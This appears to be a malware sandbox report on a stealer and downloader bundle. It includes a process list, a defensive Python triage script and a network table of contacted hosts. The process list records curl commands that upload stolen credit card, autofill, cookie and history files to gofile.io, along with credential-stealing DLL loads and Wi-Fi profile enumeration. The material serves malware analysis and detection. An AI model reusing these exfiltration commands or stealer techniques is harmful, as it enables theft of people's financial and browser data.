C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5412,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5332 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5136,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=4400,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3420,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4440 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5052,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4896 /prefetch:1

C:\Windows\system32\calc.exe

calc.exe

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5072,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3836 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe"

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\neptuno.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\neptuno.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VmManagedSetup.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VmManagedSetup.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ssg.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ssg.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xx.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xx.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\cx.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\cx.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AsyncClient.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AsyncClient.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\dropper.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\dropper.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5080,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe"

C:\Program Files\Microsoft Office\root\Office16\Winword.exe

"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Windows\System32\drivers\etc\hosts"

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe"

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Windows\system32\wscript.EXE

C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js"

C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.scr

"C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\Admin\AppData\Local\Secure360 Innovations\V"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe

"C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfbd3cc40,0x7ffdfbd3cc4c,0x7ffdfbd3cc58

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\565375082730_Desktop.zip' -CompressionLevel Optimal

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3280,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3264 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1816,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3676 /prefetch:3

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1820,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3712 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2656,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3860 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2648,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3972 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4396 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3872,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4720 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe

"C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4916,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4912 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1904,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=5028 /prefetch:8

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b735857d-e559-49b6-b15c-b9318ed9a008} 6780 "\\.\pipe\gecko-crash-server-pipe.6780" gpu

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Windows\explorer.exe

explorer.exe
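
The process list above alternates an image path with the command line that started it. The script below is an added example (not part of the original report or of any sandbox's signature set) that reads that format and pulls out the three things a responder wants first from this run: rundll32 loading a DLL from a user-writable directory (the cred64.dll / clip64.dll loads from %APPDATA%\43266f2abbf198), payloads launched from %TEMP% / %APPDATA%, and the `netsh wlan show profiles` Wi-Fi enumeration. The trusted-path prefixes, drop-directory list and the flagging rules are the author's own heuristics; the sample block is constructed from (abridged) lines copied from the list above. It also explains one detail that confuses first-time readers of such tables: the image path is SysWOW64\rundll32.exe while the command line names System32, which is WoW64 file-system redirection of a 32-bit parent, not tampering with the log.

```python
"""Triage of a sandbox process list (image path / command line pairs).

Added example, not part of the original report.  It reads the alternating
"image path" / "command line" lines the Processes section uses and flags:
rundll32 loading a DLL from a user-writable directory, payloads started
from %TEMP% / %APPDATA%, and Wi-Fi profile enumeration.  All rules are the
author's own heuristics, not the sandbox's signature set.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# rundll32 <dll>,<export>  (quotes optional around program and DLL path)
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+\.dll)"?\s*,\s*(\S+)', re.I)
NETSH_WLAN_RE = re.compile(r"netsh\s+wlan\s+show\s+profiles", re.I)
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
DROP_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")


@dataclass
class Finding:
    image: str
    cmdline: str
    reasons: List[str] = field(default_factory=list)
    dll: Optional[str] = None          # untrusted DLL handed to rundll32, if any


def parse_process_block(text: str) -> List[tuple]:
    """Pair up the non-blank lines as (image path, command line)."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    if len(lines) % 2:
        raise ValueError("expected an even number of lines (image, command line)")
    return list(zip(lines[0::2], lines[1::2]))


def _trusted(path: str) -> bool:
    return path.strip('"').lower().startswith(TRUSTED_PREFIXES)


def triage_pair(image: str, cmdline: str) -> Finding:
    f = Finding(image, cmdline)
    img = image.lower()
    m = RUNDLL_RE.search(cmdline)
    if m:
        dll, export = m.group(1), m.group(2)
        if not _trusted(dll):
            f.dll = dll
            f.reasons.append(f"rundll32 loads DLL outside trusted paths ({export} export): {dll}")
        # Image in SysWOW64 while the command line says System32: the parent was
        # 32-bit and WoW64 file-system redirection rewrote the path.  Informational.
        if "\\syswow64\\" in img and "\\system32\\" in cmdline.lower():
            f.reasons.append("32-bit parent (WoW64 redirection of System32 path)")
    if any(d in img for d in DROP_DIRS):
        f.reasons.append("executable launched from a drop directory")
    if NETSH_WLAN_RE.search(cmdline):
        f.reasons.append("Wi-Fi profile enumeration via netsh")
    return f


def triage_processes(text: str) -> List[Finding]:
    """Return only the pairs that triggered at least one rule, in list order."""
    return [f for f in (triage_pair(i, c) for i, c in parse_process_block(text)) if f.reasons]


def suspicious_dlls(findings: List[Finding]) -> set:
    return {f.dll for f in findings if f.dll}


# Constructed sample: pairs copied (abridged) from the Processes section above.
SAMPLE_PROCESS_BLOCK = r"""
C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe

"C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US
"""
```

Run `triage_processes(SAMPLE_PROCESS_BLOCK)` and join each finding's `reasons`; the Chrome renderer pair produces nothing, the two rundll32 pairs each carry the DLL reason plus the WoW64 note, and `suspicious_dlls()` gives the two %APPDATA% DLL paths to carry into the host-sweep as file indicators. In a real hunt the same pair parser works on Sysmon event 1 (Image / CommandLine) once the two fields are emitted on alternating lines.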

Network

Country Destination Domain Proto
US 8.8.8.8:53 cxcs.microsoft.net udp
DE 23.42.30.141:443 cxcs.microsoft.net tcp
US 95.101.136.201:443 www.bing.com tcp
US 8.8.8.8:53 201.136.101.95.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
NL 85.31.47.154:80 85.31.47.154 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
TH 45.141.26.234:80 45.141.26.234 tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
FI 37.27.43.98:443 tcp
AE 62.60.226.24:80 62.60.226.24 tcp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
RU 176.113.115.33:80 176.113.115.33 tcp
US 208.95.112.1:80 ip-api.com tcp
TH 185.84.161.186:80 185.84.161.186 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 69.49.234.173:443 haramb.net tcp
CN 101.200.220.118:8090 tcp
DE 23.42.16.93:443 steamcommunity.com tcp
N/A 224.0.0.251:5353 udp
TH 45.141.26.234:7000 tcp
TH 185.84.161.186:80 185.84.161.186 tcp
CO 181.131.217.244:30203 navegacionseguracol24vip.org tcp
CN 47.92.31.237:8088 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 cxlugg.sbs udp
DE 23.42.16.93:443 steamcommunity.com tcp
FI 37.27.43.98:443 tcp
US 8.8.8.8:53 condedqpwqm.shop udp
US 172.67.69.226:443 ipapi.co tcp
DE 23.42.16.93:443 steamcommunity.com tcp
US 162.159.128.233:443 discord.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
CO 181.131.217.244:30203 navegacionseguracol24vip.org tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 172.67.69.226:443 ipapi.co tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 172.67.69.226:443 ipapi.co tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 172.67.69.226:443 ipapi.co tcp
US 162.159.128.233:443 discord.com tcp
CO 181.131.217.244:30203 navegacionseguracol24vip.org tcp
CN 120.24.38.217:4433 tcp
CO 181.131.217.244:30203 navegacionseguracol24vip.org tcp
NL 104.110.240.59:443 www.bing.com tcp
NL 104.110.240.59:443 www.bing.com tcp
GB 2.18.27.76:443 r.bing.com tcp
GB 2.18.27.76:443 r.bing.com tcp
GB 2.18.27.76:443 r.bing.com tcp
GB 2.18.27.76:443 r.bing.com tcp
HK 47.238.103.180:54322 47.238.103.180 tcp
IE 20.190.159.75:443 login.microsoftonline.com tcp
US 8.8.8.8:53 180.103.238.47.in-addr.arpa udp
DE 23.42.16.93:443 steamcommunity.com tcp
NL 149.154.167.99:443 t.me tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
DE 23.42.16.93:443 steamcommunity.com tcp
NL 149.154.167.99:443 t.me tcp
FR 172.217.18.195:443 recaptcha.net tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
CO 181.131.217.244:30203 3diciembre.con-ip.com tcp
FR 172.217.18.195:443 recaptcha.net udp
US 8.8.8.8:53 170.201.250.142.in-addr.arpa udp
US 8.8.8.8:53 163.20.217.172.in-addr.arpa udp
FR 172.217.20.164:443 www.google.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
RU 185.81.68.147:443 185.81.68.147 tcp
CN 101.37.34.164:9000 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:1912 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 216.239.32.36:443 region1.google-analytics.com udp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:1912 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
CO 181.131.217.244:1515 3diciembre.con-ip.com tcp
CN 47.94.168.145:9999 tcp
DE 193.161.193.99:35184 tcp
GB 104.86.110.120:443 tcp
US 20.42.65.90:443 browser.pipe.aria.microsoft.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
US 67.205.154.243:35184 tcp
NL 104.110.240.59:443 r.bing.com tcp
TH 85.203.4.238:80 85.203.4.238 tcp
DE 193.161.193.99:35184 tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
FR 172.217.18.195:443 recaptcha.net tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
CO 181.131.217.244:1515 3diciembre.con-ip.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 67.205.154.243:35184 tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.113:443 r.bing.com tcp
NL 104.110.240.113:443 r.bing.com tcp
NL 104.110.240.59:443 r.bing.com tcp
NL 104.110.240.59:443 r.bing.com tcp
CN 183.57.21.131:8095 tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
RU 176.122.27.90:9999 176.122.27.90 tcp
CN 101.37.34.164:9000 tcp
RU 176.122.27.90:8888 tcp
US 8.8.8.8:53 90.27.122.176.in-addr.arpa udp
DE 193.161.193.99:35184 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
N/A 127.0.0.1:51822 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 67.205.154.243:35184 tcp
DE 193.161.193.99:35184 tcp
CO 181.131.217.244:1515 3diciembre.con-ip.com tcp
US 8.8.8.8:53 eveezueigohehla.co udp
RU 185.215.113.66:80 eveezueigohehla.co tcp
CN 101.35.141.80:8443 tcp
